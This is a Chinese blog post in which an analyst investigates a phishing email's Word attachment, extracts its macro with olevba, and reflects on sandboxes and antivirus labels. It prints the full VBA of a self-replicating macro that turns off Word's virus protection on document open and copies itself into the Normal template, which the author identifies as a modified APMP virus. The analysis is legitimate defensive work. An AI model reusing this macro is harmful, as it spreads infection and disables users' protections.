一个搞笑的宏病毒apmp kill

今天公司的没什么乱用的沙箱又报警了，还是老样子，钓鱼邮件。

黄老师把邮件发过来，我看了下

标题是xxx会议通知，附件一个doc，一个rar：

会议通知，看上去确实比较可疑。先用winhex打开rar。

只有ace格式才会被恶意解析。再看内容是3个jpg。看上去没啥问题。好下一个。

再看doc。

处理doc的原则是千万别在实体机上点开任何doc，教训太惨痛……我这台机器又没有装虚拟环境，借用微步云沙箱看看。。。。修改文件名，上传。这里必须注意涉密文件万不能上传。

一看吓一跳。

难道沙箱办了回人事？

再一看代码，这有短短的一小段

这里吐槽下微步，解析d0cf格式文件是成熟的技术了，ole段的解析还是灰色，不知是何道理。

解出来的代码也是缩在一起毫无可读性，排个版不行啊？不过这么一小段代码能干什么？微步把代码导全了吗？有点吃不准。

想了想还是装个oletools吧，以后分析起来也方便。python是现成的，先装pip，方法在此，再装oletools，说明在此。注意python3的环境要用pip3安装。

用命令 olevba [文件路径] >[导出文件路径]，获得代码，真的只有20行。。。

'APMP
'KILL
Private Sub Document_Open()
   On Error Resume Next
   Application.DisplayStatusBar = False
   Options.VirusProtection = False
   Options.SaveNormalPrompt = False
   MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20)
   Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
   If ThisDocument = NormalTemplate Then _
      Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
   With Host
       If .Lines(1, 1) = "APMP" & .Lines(1, 2) <> "KILL" Then
          .DeleteLines 1, .CountOfLines
          .InsertLines 1, MyCode
          If ThisDocument = NormalTemplate Then _
             ActiveDocument.SaveAs ActiveDocument.FullName
       End If
   End With
End Sub

好大一个KILL……仔细一看这分明是某个叫apmp宏病毒的免疫程序啊！很有想法，发现宏病毒了就把代码删了，在把自己填上去……但这代码看上去非常的……野路子感……有种以毒攻毒的感觉。

网上翻到了apmp宏病毒的原始代码，我看了下...............我倒

这根本没啥两样啊！原来免疫程序是用病毒代码改的啊-_-!我是比较佩服作者的脑洞的，为了免疫一个病毒，改造出了另一个病毒……我服了。

感想有几个：

1. 公司的沙箱真的没有任何卵用，天天报这些狗屁倒灶的东西。我测试ace漏洞之流从来不报。
2. 杀软静态扫描结果是瞎讲八讲，什么tojan.gen，macro.thus，一搜都吓死人。其实一看就是个恶作剧代码。
3. 微步的云沙箱ole的分析方面还有提升的空间。
4. 浪费了我一个上午， 其实大部分时间都在装环境。
5. 病毒四奇葩，免疫程序也是奇葩。